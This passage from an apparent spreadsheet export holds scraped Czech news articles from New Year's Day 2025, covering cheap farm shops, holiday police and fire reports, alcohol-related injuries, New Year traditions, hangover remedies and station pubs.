    <t>V Česku vzniká síť nových obchodů. Tuzemské produkty za poloviční cenu. Češi jsou z toho štěstím bez sebe Nakoupit ve slevě je snem snad každého zákazníka. Existují však obchody, kde jsou nízké ceny běžnou praxí. Víte od nás, že třeba máslo patří mezi jednu ze základních surovin, bez které si svůj jídelníček velká část Čechů ani neumí představit. To dokresluje také množství másla, které každý Čech za rok průměrně sní. Například v roce 2021 to bylo 5,3 kilogramů na osobu . V poslední době však tato klíčová surovina razantně zdražuje. Ceny potravin se neustále zvyšují Průměrná cena másla se pohybuje okolo 70 korun. Podle Potravinářské komory za to mohou zvýšené marže obchodů, jak již dříve informoval web Novinky. Ekonomové přitom zdůrazňují faktory jako méně tuku v mléce, růst mezd, kurz koruny nebo typické zdražování potravin ke konci roku . Potravinářská komora uvedla, že do cen másla se promítly letošní teplé počasí, kvůli kterému dojnice produkovaly méně mléka a rostoucí cena práce. Čeští zemědělci otevřeli vlastní obchod: Takhle nízké ceny tu ještě nebyly. Velké řetězce to můžou rovnou zabalit i Zdroj fotografie: Policie ČR Zákazníci tuzemské produkty téměř vždy ocení Ceny se však zvedají také u dalších komodit. Například salátové okurky se v září prodávaly podle dat statistiků za 75 korun za kilo. To je více než dvakrát dráž než ve stejném měsíci loni. Ze zeleniny podražil také květák skoro o 30 procent a mírněji šla nahoru i cena rajčat . Výrazně zdražilo i mléko nebo čokoláda. Naopak o něco zlevnily chléb a drůbeží maso. Nadále však nekončí zdražování v restauracích, včetně piva , píše web Novinky . Nabídka se neustále obměňuje Existuje však také obchod, ve kterém mohou zákazníci nakoupit zboží až o polovinu levněji oproti běžným obchodním řetězcům. Konkrétně jde o Hanácký grunt Zemědělského družstva Unčovice . Informoval o tom web Olomoucký deník. Zákazníci v těchto prodejnách nakoupí třeba vepřovou pečeni s kostí za 110 korun nebo krkovici za 115 korun za kilogram. Kromě čerstvého masa z vlastní produkce jsou v nabídce i výrobky farmářů. Znáte tento superlevný řetězec? Potraviny tam nakoupíte za 50 % běžné ceny. Je dobré tam jít nakoupit včas, než se vše vyprodá i Zdroj fotografie: Daniel Procházka pro Události247 Řada Čechů aktivně vyhledává slevy, nebo si zjišťuje, kde jsou zrovna dané produkty nejlevnější Například mléko a mléčné výrobky, vejce, pečivo nebo zelenina a ovoce. V Unčovicích , místní části Litovle , obchod chyběl. Místní byli odkázáni na pojízdnou prodejnu nebo museli za nákupem cestovat do Litovle . Navíc si sem zvykli na nákupy jezdit i obyvatelé okolních měst a obcí. Láká je nejen čerstvý sortiment, ale také právě velmi příznivé ceny oproti běžným prodejnám. Aktuální nabídku lidé najdou také na facebooku Hanáckého gruntu. Autor: Daniela Beránková Autor person Daniela Beránková</t>
  </si>
  <si>
    <t>149110</t>
  </si>
  <si>
    <t>99420</t>
  </si>
  <si>
    <t>20250101_345_3697448226_5ffe66bb468e72bfa4ec.html</t>
  </si>
  <si>
    <t>5ffe66bb468e72bfa4ec</t>
  </si>
  <si>
    <t>Silvestr ve Středočeském kraji. Poslední den roku byl téměř totožný s loňským</t>
  </si>
  <si>
    <t>Silvestr ve Středočeském kraji . Poslední den roku byl téměř totožný s loňským Policie České republiky – KŘP Středočeského kraje Silvestr ve Středočeském kraji . . . KRAJ - Poslední den roku byl téměř totožný s loňským. Na poslední den v roce , který bývá z pohedu oznámených událostí většinou velmi exponovaný, dohlížely ve Středočeském kraje vyšší počty policistů a hlídek, které byly v terénu a mohli tak okamžitě reagovat na nahlášená ozámení. Za celý silvestrovský den, tedy až do půlnoci, kontaktovali občané policisty na lince tísňového volání s 285 telefonáty (vloni cca 300) . Od půlnoci do šesté hodiny ráno pak přijali policisté sloužící na lince 158 celkem 150 oznámení (vloni 160). .A čeho se nejvíce oznámení týkala? Lidé oznamovali hořící popelnice, koše, hořící krabice od pyrotechniky, stěžovali si ale i na hluk od petard. Každoročně dochází k různým potyčkám a napadením, většinou podpořena předešlou konzumací alkoholu a nejinak tomu bylo i letos. Policisté přijímali oznámení o hádkách, fyzických napadeních, někteří se zraněními skončili i v nemocnici . Tyto případy již policisté řeší v trestně-právní rovině, kdy prověřují "aktivitu" jednotlivých účastníků těchto incidentů, u kterých též nechyběl alkohol . Méně bylo ale dopravních nehod, od silvestrovského rána do půlnoci přijali operační důstojníci 56 oznámení dopravních nehodách, po půlnoci do sedmé ráno pak pouze sedm. Jedna z nich se stala patnáct minut již v roce 2025 u v blízkosti železničního přejezdu u Rohatska na Mladoboleslavsku , kdy dívka r . 2004 zřejmě dostala při řízení smyk a havarovala s vozidlem, ve kterém seděly další osoby, do příkopu před železničním přejezdem. Dívka za volantem nadýchala něco málo přes desetinu promile. Jednou z prvních událostí byl pak nahlášen skok 33letého muže z druhého patra domu na Příbramsku . Byl převezen do nemocnice a policisté zjišťují, co ho k takovému činu vedlo. Na linku 158 přijímali policisté i spoustu oznámení, tedy spíše zbytečných a někdy až obtěžujících. Například od opilců, kteří měli potřebu policistům vulgárně a dost nevybíravě nadávat. Oproti tomu volali i ti, kteří jim za jejich práci děkovali, nebo se jim svěřovali se svými problémy a starostmi. Všechna tato volání policisté rychle ukončovali, aby tísňová linka nebyla blokována pro oznámení jakékoliv "tísně". Z pohledu policistů, kteří dvacet čtyři hodin sloužili na lince 158, nebyl tedy poslední den roku 2024 nijak vybočující či významně jiný, než ten loňský. A to jak z pohledu počtu oznámených událostí, tak jejich obsahu. Nicméně neřešili žádnou dramatickou událost či kolizi, která by někoho stála život. O některých událostech a incidentech budeme konkrétněji informovat hned první dny nového roku . S přáním hodně zdraví a všeho dobrého v roce 2025 . . . mjr. Mgr. Vlasta Suchánková vedoucí OTP 1. ledna 2025 Autor: Kurzy.cz || Policie.cz | (Policie)</t>
  </si>
  <si>
    <t>20250101_346_3694114551_ec363da5bea993d04ef9.html</t>
  </si>
  <si>
    <t>ec363da5bea993d04ef9</t>
  </si>
  <si>
    <t>Opilec se zřítil z výšky přímo na hlavu, další spadl po hlavě do kolejiště a třetí se udeřil do hlavy po pádu na zem</t>
  </si>
  <si>
    <t>Opilec se zřítil z výšky přímo na hlavu, další spadl po hlavě do kolejiště a třetí se udeřil do hlavy po pádu na zem Pád z výšky tří metrů přímo na hlavu, pád do kolejiště na hlavu a úder do hlavy po pádu na zem v důsledku vratké chůze. To jsou tři případy, ke kterým vyjížděla plzeňská městská policie a následně i záchranáři. A ve všech třech případech sehrál důležitou roli alkohol . Přesně řečeno, značné množství vypitého alkoholu . „Z ulice Pallova nám na tísňovou linku zavolala žena a oznámila, že právě viděla muže, který spadl ze zídky vedoucí kolem hotelu, a to přímo na hlavu. Nutno podotknout, že zídka v tomto místě dosahuje výšky zhruba tři metry. Po příjezdu našli strážníci dvaatřicetiletého muže kousek od místa, kam dopadl na zem. Stěžoval si na bolest zad a hlavy, působil zmateně a pokoušel se z místa odejít,“ popsala první případ mluvčí městské policie Tereza Schliková . Hlídka zraněnému vysvětlila, že po takovém pádu není odchod dobrý nápad. Muže uklidnila a vzhledem k jeho zdravotnímu stavu a povaze pádu přivolala na místo záchrannou službu. Před jejím příjezdem byla u muže provedena dechová zkouška, která ukázala 2,47 promile. Po příjezdu záchranářů lékařka rozhodla o převozu muže k dalšímu vyšetření do nemocnice. K dalšímu nahlášenému opilci se zraněním hlavy spěchalo hned několik hlídek MP do Solní ulice. Zraněného devětatřicetiletého muže strážníci našli opřeného o zeď s viditelnou tržnou ránou na hlavě. Strážníci mu poskytli první pomoc a ránu ošetřili. „Svědek na místě sdělil, že viděl muže upadnout do kolejiště a udeřit se do hlavy. Následně zůstal na místě a počkal na příjezd strážníků. Zraněný muž vykazoval známky opilosti a dechová zkouška u něj ukázala 3,56 promile. Vzhledem k jeho zranění byla na místo přivolána záchranná služba, která si dotyčného převzala a transportovala jej do nemocnice,“ uvedla mluvčí Schliková. O tom, že dohromady nejde chůze zkombinovaná s předchozím větším množstvím vypitého alkoholu se přesvědčil také sedmadvacetiletý muž. Nohy mu přestaly fungovat v Gerské ulici. Když se zřítil na zem, ošklivě se udeřil do hlavy. Naštěstí k němu náhodný svědek události přivolal pomoc. „Po příjezdu na místo strážníci našli na parkovišti před obchodem opilého muže i s oznamovatelem, který uvedl, že dotyčný při pokusech vstát upadl a silně se udeřil do oblasti hlavy. Opilý muž následně nadýchal 3,83 promile a na místě si ho převzala do své péče záchranná služba. Lékař poté rozhodl o převozu opilého muže do nemocnice za doprovodu strážníků,“ doplnila Tereza Schliková. Autor: Richard Beneš Autor person Richard Beneš Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>20250101_347_3694559021_d5fb5c76033659773900.html</t>
  </si>
  <si>
    <t>d5fb5c76033659773900</t>
  </si>
  <si>
    <t>Silvestrovské oslavy v Olomouckém kraji se obešly bez větších požárů</t>
  </si>
  <si>
    <t>Silvestrovské oslavy v Olomouckém kraji se obešly bez větších požárů 1. ledna 2025 6:37 , aktualizováno 10:35 Sdílet článek ilustrační snímek | foto: Metro.cz Jako poměrně klidné hodnotí hasiči silvestrovské a novoroční oslavy v Olomouckém kraji. Obešly se bez větších požárů. Hasičské jednotky za celou noc vyjížděly k 28 požárům, většinou se jednalo o hořící kontejnery na odpad či o malé požáry způsobené odpálenou zábavní pyrotechnikou. ČTK to dnes sdělil mluvčí hasičů Josef Koláček . Hodně práce měly na přelomu roku posádky zdravotnické záchranné služby . Celkem v kraji evidují 222 výjezdů, loni jich bylo 203. Do úterních 23:00 hasiči v kraji vyjížděli v souvislosti se silvestrovskými oslavami k osmi požárům a do dnešních 01:00 jejich počet vzrostl na 14. "Jednalo se převážně o zahoření kontejnerů na odpad a zbytkové požáry po odpálení pyrotechniky," uvedl Koláček . Kontejner na odpad vzplál například na Svatém Kopečku, což je městská část Olomouce . Do ranních hodin pak celkový počet výjezdů hasičů vzrostl na 28. "Z toho bylo 23 požárů, přičemž 22 z nich vzniklo v souvislosti s použitím zábavní pyrotechniky," dodal Koláček . Pro zdravotnickou záchrannou službu byly oslavy příchodu nového roku rušnější než loni. Lékaři v úterý a v noci na dnešek řešili čtyři úrazy spojené s odpalováním zábavní pyrotechniky. V úterý večer ošetřili v Olomouci muže, kterému exploze amputovala prsty na ruce. Zábavní pyrotechnika dvěma osobám poranila oko a jeden člověk si při odpalování rachejtlí zranil paži. Zdravotnická záchranná služba při silvestrovských a novoročních oslavách v kraji evidovala také 12 výjezdů, které souvisely s napadením osob, a čtyři výjezdy k řezným poraněním. Lékaři ošetřili jednoho člověka intoxikovaného alkoholem a deset lidí, kteří si v opilosti přivodili úraz. Autor: ČTK Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_348_3694131225_3bbe3c09deb2f67250b2.html</t>
  </si>
  <si>
    <t>3bbe3c09deb2f67250b2</t>
  </si>
  <si>
    <t>Denní výběr: VIDEOROZHOVOR: Kynžvartské lvice se chystají na kořist. Do Chebu dorazí Hodonín</t>
  </si>
  <si>
    <t>20250101_349_3694131120_a34a13100a48e9733dca.html</t>
  </si>
  <si>
    <t>a34a13100a48e9733dca</t>
  </si>
  <si>
    <t>Denní výběr: Mráz a mlha, přesto na Klučovce v Třebíči závodilo přes 200 běžců. Podívejte se</t>
  </si>
  <si>
    <t>20250101_35_3698727253_2b5a13bf5a07a97ffbfe.html</t>
  </si>
  <si>
    <t>2b5a13bf5a07a97ffbfe</t>
  </si>
  <si>
    <t>Vítání nového roku v Česku</t>
  </si>
  <si>
    <t>Vítání nového roku v Česku Moderátor Michal Kubal : Oslavy v Česku byly pro zdravotníky náročnější než loni. A nejen pro ně. Hasiči o silvestrovské noci zaznamenali přes 350 požárů, nejvíc za sedm let. Autor Vítězslav Komenda: Za výhledy na Prahu vyrazila Petra Broster s rodinou ještě před půlnocí. Petra Broster: Každý rok se chodíme dívat, na to, jak někdo pouští ohňostroje, ale letos to moc nevypadá, protože je hrozná mlha. Autor Vítězslav Komenda: To sourozenci Slavíčkovi si s počasím hlavu nedělali. Václav Slavíček: Myslím si, že jakmile si člověk dá kapku alkoholu , tak je mu to celkem jedno. Vojtěch Slavíček: Jedna kapka, dvě kapky a je mu krásně, pane. Autor Vítězslav Komenda: Hlavním centrem oslav v hlavním městě ale bylo tradičně Václavské a Staroměstské náměstí . Na bezpečnost napříč Prahou dohlížely stovky policistů. Neuveden: Vy jste odpaloval rachejtle, víte, že je to proti vyhlášce? Neuveden: No úplně ne, protože to, co jsem odpaloval já, tak je světlice. Eva Kropáčková, policejní mluvčí: Po půlnoci jsme každou minutu přijali jedno oznámení na tísňovou linku, týká se to především drobných požárů, dále potyček a různých konfliktů. Neuveden: Je krátce po půl jedné a hlavní část silvestrovských oslav tady v Brně pominula, ale i přesto lidé dál odpalují zábavní pyrotechniku. Dokonce přijeli hasiči a musí hasit požár. Autor Lea Surovcová: Oslavovalo se i na pražských Náplavkách. Na lodích i mostech. V pohotovosti proto byl i tým vodních záchranářů, který hlídal bezpečnost přímo z hladiny Vltavy . Pravidelně se ozývaly ohňostroje, což by se podle vyhlášky v těchto místech dít nemělo. Jiří Jaroš, člen Vodní záchranné služby ČČK Prahy 6: Dnešní noc je celkem klidná, neměli jsme zatím žádné zásahy, je to způsobené i tím, že dnešní noc je mrazivá, máme -4 stupně a je hodně mlha, tak moc lidí tady zatím není. Autor Lea Surovcová: Poraněné ruce po úderu, zlomený kotník, žebra i řezné rány. Desítky případů, které řešili na tomto oddělení v pražské Všeobecné fakultní nemocnici . Jeden z pacientů právě čeká na šití hlavy. Neuveden: Šel jsem po schodech dolů a asi jsem někde sklouzl a rozbila se mi hlava. Autor Lea Surovcová: Pořádně si nepamatujete, co se stalo? Neuveden: Nepamatuji. Autor Lea Surovcová: Závažnější případy začaly přibývat po jedné hodině ráno ráno. Teď je půl třetí a stále přichází jeden pacient za druhým. Vladimír Frýba, vedoucí lékař služby, 1. chirurgická klinika, VFN a 1. LF UK : Buď nějaká těžká opilost s úrazem hlavy nebo i kuriózní případy. Teď čerstvý případ pacienta, který si zlomil pažní kosti, v opilosti pochopitelně, když hrál páku. Autor Lea Surovcová: To úklidovým četám práce po třetí hodině ranní teprve začala. V Olomouci stroje doplnila zhruba desítka pracovníků, kteří odpadky sbírali. Největší nepořádek likvidovali hlavně na sídlištích.</t>
  </si>
  <si>
    <t>651170</t>
  </si>
  <si>
    <t>20250101_350_3694131047_4cf0d58b08f07af14d4d.html</t>
  </si>
  <si>
    <t>4cf0d58b08f07af14d4d</t>
  </si>
  <si>
    <t>20250101_351_3694135447_8b8677e129fd15e89906.html</t>
  </si>
  <si>
    <t>8b8677e129fd15e89906</t>
  </si>
  <si>
    <t>Kde se vzal silvestr, co byl Babí den a proč nesmí viset na Nový rok prádlo: Některé novoroční tradice už zná málokdo</t>
  </si>
  <si>
    <t>Kde se vzal silvestr, co byl Babí den a proč nesmí viset na Nový rok prádlo: Některé novoroční tradice už zná málokdo Začátek nového roku sice není tak důležitým obdobím, jako jsou třeba Vánoce, ale i tak byl vždy vnímán jako důležitá a sledovaná událost. Vážou se k ní různé pranostiky, pověry a tradice, které naši předkové dodržovali. Některé jsou ostatně známé dodnes. Jaké zvyky dodržujete na Nový rok vy? Zábava | Zuzana Heralová | 1. 1. 2025 Oslavy příchodu nového roku máme spojené hlavně s alkoholem , chlebíčky a ohňostroji a všichni je známe pod označením silvestr. Zároveň má v poslední den roku svátek Silvestr, což je trochu neobvyklé a ne příliš rozšířené jméno, které má ale dlouhou tradici. Kdo byl Silvestr Silvestr I. byl skutečnou historickou postavou. Žil na přelomu třetího a čtvrtého století našeho letopočtu a byl hlavou tehdejší křesťanské církve. Ještě než nastoupil do svého úřadu, zažil pronásledování křesťanů a sám musel prchat a ukrývat se v lesích blízko Říma . Později pak přijal jméno Silvestr, které má původ právě v latinském slově „silva“, což znamená les. Po svém nástupu na papežský stolec vydal mimo jiné příkazy, co, kdy a jak se smí veřejně oslavovat. V té době se v Římě ještě oslavovaly Saturnálie, což byly hodně divoké oslavy boha Saturna, jež trvaly několik dní. Silvestr takové oslavy odsoudil jako nehodné křesťanů, ale odkaz Saturnálií nakonec úplně nevymizel. Nakonec tomu osud chtěl, aby papež Silvestr zemřel právě 31. prosince roku 335 . Tradice, které vymizely Hospodyně se na příchod nového roku připravovaly vždy s předstihem. Po vánočních svátcích se uklízelo, pralo a převlékalo se povlečení. Muselo se to ovšem dělat s předstihem, protože podle tradice nesmělo na Nový rok na šňůrách viset prádlo. Podle pověry by totiž v novém roce mohl zemřít někdo blízký. Nesmělo se ani zametat, aby nebyl nikdo z rodiny „vymeten“ ven. Protože byl ale pořádek důležitý, chodily po staveních takzvané báby ometačky a riziko na sebe místo hospodyní braly ony. Šlo o chudé ženy, které, za almužnu ometaly kamna a plotny, aby se nestalo neštěstí. Proto se někdy poslednímu prosinci říkalo „ Babí den “. Novoroční menu Do nového roku se lidé museli podle tradic vypořádat se všemi dluhy a odpustit svým nepřátelům, což podporovala právě křesťanská církev. Pokud jde o peníze, je tu známá a oblíbená tradice s čočkou. Když si jí dáte k obědu, nebudou vám finance chybět. Na druhou stranu měli ale naši předkové některá jídla zakázaná. Nesměli se jít například zajíci, aby neuteklo štěstí. Drůbež, aby neuletělo a ryby, aby neuplavalo. Rodina pak měla obědvat pospolu a v klidu. Už tenkrát se říkalo, že „ jak na Nový rok, tak po celý rok.“ Petardy mají také tradici Jakkoli se v současnosti upouští od ohňostrojů a odpalování petard, i tato aktivita má svůj původ v historii. Naši předkové totiž věřili v existenci zlých duchů, kteří by mohli rodině škodit. A proto se snažili tyto duchy odehnat. Dokud nebyly klasické petardy, dělal se hluk, čím se dalo. Například se práskalo se bičem, případně cinkalo zvonečky, kterých se prý zlí duchové také bojí. Čtěte také: Tarotový výklad kartářky Alice Cross na rok 2025: Zjistěte, co vás podle karet čeká v oblasti zdraví, lásky a financí Zdroj článku www.kudyznudy.cz, www.flowee.cz Doporučená videa z partnerského webu z Lifee.cz : silvestr zábava oslava tradice Autor: zuzana.heralova</t>
  </si>
  <si>
    <t>20250101_352_3694082191_6bd5eae1b80ea991066a.html</t>
  </si>
  <si>
    <t>6bd5eae1b80ea991066a</t>
  </si>
  <si>
    <t>Nejlepší vyprošťováky, které rychle zbaví kocoviny. Neuvěříte, co všechno vás postaví na nohy</t>
  </si>
  <si>
    <t>Nejlepší vyprošťováky, které rychle zbaví kocoviny. Neuvěříte, co všechno vás postaví na nohy info 4 fotografie Silvestrovská oslava se protáhla do brzkých novoročních hodin, alkohol tekl proudem a spánku zrovna moc nebylo. Probudila vás totiž bolest hlavy a žaludek máte jako na vodě. O slovo se přihlásila kocovina… Těžká jitra opilcova – už mnohé generace před námi měly tuhle zkušenost. Večerní a noční zábava a popíjení – někdy i míchání, no fuj – alkoholu připraví po probuzení kombinaci zdravotně dost nemilých stavů, jako jsou bolest hlavy, nevolnost od žaludku, silný pocit žízně a citlivost na světlo i hluk. Kde se vzala kocovina? První návštěvou – a jistě nezvanou –, která vás v novém roce poctila svou přízní, je kocovina. Stav, který nastává jako vedlejší účinek konzumace alkoholu . Ta se v našem těle vytvoří po požití toxinů, které se nacházejí v alkoholu . Náš imunitní systém na tyto toxiny reaguje uvolněním bílkovin, které pak společně s dehydratací způsobují onen nepříjemný stav. VIDEO: Podívejte se na výborné vysvětlení faktu, proč máme kocovinu. Zdroj: Youtube Pojem kocovina má základ ve starém slově kočičina, jehož významem je výtržnost. Vznikl jako mnoho tehdejších slov z němčiny, kdy se na přelomu 18. a 19. století začalo slovo Kater (kocour) v podobě Kate využívat i pro stav opojení. A různými úpravami a komolením je tu dnešní kocovina. Co mi nejrychleji pomůže? Jak se s tímto nepříjemným stavem co nejrychleji vypořádat? Na řadu přichází pomocník lidově zvaný vyprošťovák. Zajímavé je, jak si tento nápoj nebo pokrm představují v různých koutech světa. Někde vsadili na staré a časem prověřené rady, jinde na to jdou podle nejnovějších vědeckých výzkumů a moderních trendů. Pro začátek se tedy rozhodně něčím zavodněte, ať vás opustí aspoň nepříjemný pocit sucha v ústech a krku a ať máte sílu pokračovat v „zaručených“ vyprošťovacích receptech. gallery 4 video Tipy od protinožců Nový rok nejdříve oslaví tichomořské ostrovy a s nimi i Austrálie a Nový Zéland . Australané léčí kocovinu docela labužnicky – toastem s rozmačkaným avokádem. Vysoký obsah draslíku rychle doplní jeden z klíčových minerálů, které alkohol svým řáděním požral. A když zvládnete toast před usmažením ještě obalit ve vajíčku, tak prý máte k dispozici doslova vyprošťovací zázrak. Na nedalekém Novém Zélandu mají recept, který už tak gurmánsky nezní. Strouhaný sýr (není bohužel přesně určeno, jaký druh) tam zapíjejí kakaem „vylepšeným“ špetkou soli. Asijské speciality Největší světový kontinent v našem pomyslném vyprošťovacím cestopisu zastupuje Vietnam . A se zdejším receptem na kocovinu bude jistě spokojena celá řada Čechů. Jde o známou vietnamskou polévku Pho bo, kterou si celá řada z nás dopřeje i v průběhu roku. Silný vývar je plný živin, maso je bohaté na proteiny, chilli pozitivně nastartuje organismus a voda obsažená v polévce je vhodným doplňkem k zavodňování alkoholem vyprahlého těla. Balkán a Turecko mají stejný tip Když to vezmeme dále na západ a s během hodinových ručiček, na pomezí Asie a Evropy dorazíme do Turecka . Zde mají na vypořádávání se s přemírou alkoholu stejný recept jako na nedalekém Balkánu. V těchto končinách je oblíbeným vyprošťovákem dršťková polévka. Ta je podle lokálních tradic doplněna octem, paprikou, cibulí, slaninou, vejci, citronem, ale třeba i zjemněna mlékem. Pestrost starého kontinentu Jak je Evropa pestrá národově, tak je bohatá na tipy, kterak se zbavit kocoviny. V Itálii podávají v jejich vnímání světa všelék – silné espresso. Ovšem proti tomuto trendu vystupují v poslední době vědci, kteří pití kávy (v našich končinách dříve podávané s citronem nebo třeba i osolené) považují za nesmysl. Kromě toho, že neobsahuje ty správné léčivé látky, má navíc i odvodňovací účinky, což je při kocovině špatně. Francouzi mají „k léčbě“ také nápoj, při jehož konzumaci se řídí známým heslem: Čím ses pokazil, tím se také naprav. V jejich podání je to známý koktejl Bloody Mary, který se skládá z vodky, rajčatové šťávy, soli, pepře, citronu, tabasca a worcesterské omáčky. Pokračujeme do Německa , kde nedají dopustit na svůj poctivý currywurst. Kombinace mastné klobásy přelité kořeněnou omáčkou nebo aspoň hořčicí posypanou kari kořením ale jistě nebude tím pravým vyprošťovákem pro každého. Dva recepty z britských ostrovů V Británii také umějí pořádně popít, obzvlášť na silvestra jistě teče pivo proudem a občas se proloží nějakou tou skotskou nebo irskou whisky. A na Nový rok ráno prý není nad typickou britskou snídani, tedy klobásky, slaninu, houby, vajíčka, fazole. Kdo by si nemohl tento luxus dopřát, dobrou náhradu je při cestě z novoročního mejdanu si někde na ulici koupit do ruky klobásu v listovém těstě. V poslední době řada Angličanů vsází i na rozpečený sýr, ať už samotný, nebo na toastu. Za buvoly do Afriky Černý kontinent má svého zástupce v Namibii . Zde když to přeženou s alkoholem , si ráno dají sklenici buvolího mléka. Aby vás ale nezmátl název, nemá nic společného se zvířaty. Obsahem tohoto koktejlu jsou: zmrzlina, bílý rum, tmavý rum, krémový likér a zakysaná smetana. Exotika za velkou louží Když se přeplavíte přes Atlantik , můžete si třeba v Bolívii jako vyprošťovák dát něco, co nám Čechům připomene guláš. Omáčka s vepřovým masem, bramborami, česnekem, kmínem a vydatným množstvím chilli papriček má být ten správný lék na kocovinu. Vrcholem všech světových vyprošťováků budiž vyhlášen mexický nápoj zvaný Vuelva de la vida, v překladu Návrat do života. Jeho složení je prý léty vybrušované a laděné k dokonalosti a účinnosti. Když si přihnete trošku víc tequily, počítejte v Mexiku s tím, že k napravení dostanete koktejl kombinující mořské plody (krevety, chobotnice a ústřice), rajčata, chilli papričky, česnek a cibuli, to vše naložené v nálevu z kečupu a šťávy z limetek a citronů. Kdo dá tohle, toho v právě začínajícím roce už asi jen tak nic nepřekvapí. gallery 4 A co u nás doma? Abychom nezapomněli ani na ty, které bude bolet hlava doma v české kotlině nebo u moravských sklípků. Zkušení pijani si už přes den na silvestra připraví silný vývar nebo česnečku. V poslední době se rozmáhá i po malých doušcích popíjená coca-cola (prý ale jenom ta originální). Někdo sází na doplnění iontů a minerálů, které jsou obsaženy v kokosové šťávě. Dobrý je i hrnek vlažného zeleného čaje anebo kyselé okurky či zavináče, které vyrovnají kyselost v žaludku. A když jsme v Česku, nesmí chybět ani oblíbený a dosti rozšířený vyprošťovák – jedno malé pivečko. Kromě potřebných vitaminů a minerálů prý jeho malý obsah alkoholu také vyrovnává hladinku, a zpomaluje tak příliš rychlé a „bolestivé“ alkoholové odbourávání. Možná právě u vás bylo vítání roku 2025 trošku víc bujaré, a tak vás navštívila kocovina s bolestí hlavy jak střep a řádně pocuchaným žaludkem. Nezbývá tedy než vám popřát, aby u vás neplatilo pořekadlo: Jak na Nový rok, tak po celý rok. Šťastnej a veselej! Facebook X.com Threads Email Kopírovat Zavřít Petr Lízal facebook instagram Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. vlm Copyright © VLTAVA LABE MEDIA a.s. všechna práva vyhrazena Publikování, šíření nebo jakékoliv jiné užití obsahu pro jiné než osobní účely uživatele, je bez písemného souhlasu VLTAVA LABE MEDIA a.s. zakázáno. Toto ustanovení platí také pro RSS kanály a jejich obsah. Přihlášení Rádi bychom znali důvod proč se nechcete přihlásit. Odběr newsletteru Chcete pravidelně dostávat výběr nejlepších článků na Váš e-mail? Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Skutečně se chcete odhlásit? Při oslavách příchodu nového roku málokdy zůstane jen u skleničky sektu. Když to se silvestrovskou oslavou přeženete, může vás hned na Nový rok navštívit kocovina. Česnečka je jedním z nejlepších vyprošťováků. Hlava bolí jako střep, žaludek je jako na vodě a každý zvuk vás úplně drásá – to všechno s sebou přináší kocovina.</t>
  </si>
  <si>
    <t>125250</t>
  </si>
  <si>
    <t>20250101_353_3694131046_7ff8398dd1c6654ca362.html</t>
  </si>
  <si>
    <t>7ff8398dd1c6654ca362</t>
  </si>
  <si>
    <t>Denní výběr: Spi v teple. Boskovičtí koupí dvě iglú pro bezdomovce</t>
  </si>
  <si>
    <t>20250101_354_3694131045_d8f8f625bf5a272208bc.html</t>
  </si>
  <si>
    <t>d8f8f625bf5a272208bc</t>
  </si>
  <si>
    <t>20250101_355_3694055623_2089c43907e230a6e481.html</t>
  </si>
  <si>
    <t>2089c43907e230a6e481</t>
  </si>
  <si>
    <t>„Mladí pochopili kouzlo karbanátku s vlašským salátem.“ Z opovrhovaných nádražek se stává kult</t>
  </si>
  <si>
    <t>„Mladí pochopili kouzlo karbanátku s vlašským salátem.“ Z opovrhovaných nádražek se stává kult V jednom rohu roztopená kamna, v dalším štamgast s kytarou v ruce. Všemu vévodí malba parního vlaku a výčepní pult. V nabídce je lokální pivo , klobása nebo utopenec. Tak to vypadá v restauraci na nádraží v severočeském městečku Úštěk , které leží na zrekonstruované trati Česká Lípa – Postoloprty . Je to jedna z těch klasických nádražních restaurací. Žádné sójové latté, ale turek. Místo croissantu a fresh bagety zmíněný utopenec nebo klobása na grilu, případně polévka. Mohlo by se zdát, že tyto podniky už nikoho nezajímají a rychle mizí. Opak je pravdou. I když budoucnost jim nepřeje. „My jsme tu na výletě. Dostali jsme se sem dvěma spoji, dáme si pivo a jedeme zpátky domů,“ svěřuje se dvaadvacetiletá Tereza. Je jedna z těch, kteří mají nádražky jako občasný výletní cíl. „Máme to tady moc rádi. Dobré pivo , příjemné retro prostředí. Čas od času sem zavítáme. Měli jsme tu i jednu ze zastávek, když jsme s přáteli na jaře vyrazili na cestu po nádražkách. Za jeden den jsme jeli osmi vlaky a navštívili jsme pět nádražek. Nešlo o alkohol , ale zážitky a pěkný výlet,“ rozpovídala se Tereza. Problém: vlaky až moc navazují Mezi oblíbenými nádražkami, které při zmíněné výpravě navštívila, jmenuje vyhlášenou Jedlovou. Vlaková zastávka Jedlová leží v krásném prostředí Lužických hor v nadmořské výšce 544 m. n. m. Nevede sem silnice, ale koleje ano. Je možné sem dojet vlakem od Děčína nebo od České Lípy . Přes Lípu sem jezdí také sezónní víkendový rychlík z Prahy . V jednom z posledních v tomto roce se se svým vztahem k nádražním restauracím svěřil i šedesátiletý Jirka. „Jedlová je fajn. Dobrá kuchyně, dobré pivo i prostředí. Dám si jídlo, pivko, zajdu na procházku, všude okolo jsou lesy a pak pojedu zpátky,“ popisuje své plány Jirka. „Na hodně místech už nádražky zanikly, ale pár těch pravověrných se drží. Problém je, že vlaky dnes až moc navazují. Dřív se muselo víc čekat na spoje, tak lidi do nádražky zašli,“ říká v nadsázce železniční cestovatel Jirka. „Třeba tady ve Všetatech . Teď jsem měl na přestup asi tři minuty. Kdybych měl hodinku, došel bych do zdejší dobré nádražky,“ přibližuje. Nádraží ve středočeských Všetatech leží mezi dvěma tratěmi. A mezi nimi leží i ona známá nádražka. Svět jménem Jedlová Po příjezdu vlaku přes nádhernou krajinu Lužických hor na opravenou železniční stanici Jedlová slyšíme tóny známých písniček. Je neděle a trempové sešli z lesů, dali si pivo a hrají. Kytary doprovází foukací harmonika a basa. Návštěvníci před hospodou jsou veselí, pijí kafe, pivo , jedí knedlíky, někteří tancují. Nádražka je plná k prasknutí. Personál roznáší klasické hotovky v cenách okolo 150 korun. Guláš, prejt, plněné knedlíky, kachna, španělák a tak dále. Není to tak dlouho, co se tu vyměnil provozovatel, vysokou kvalitu i pověst kultovního podniku si hospoda drží. Ve správné nádražce visí na zdi tabule s odjezdy vlaků. A tak je to i tady. „Jsme tu podruhé. Poprvé jsme jeli jen na oběd a zpátky. Dnes poobědváme, zajdeme na nedalekou zříceninu a potom zpátky. Dětem se tu moc líbí. Mají rády vlaky,“ svěřuje se 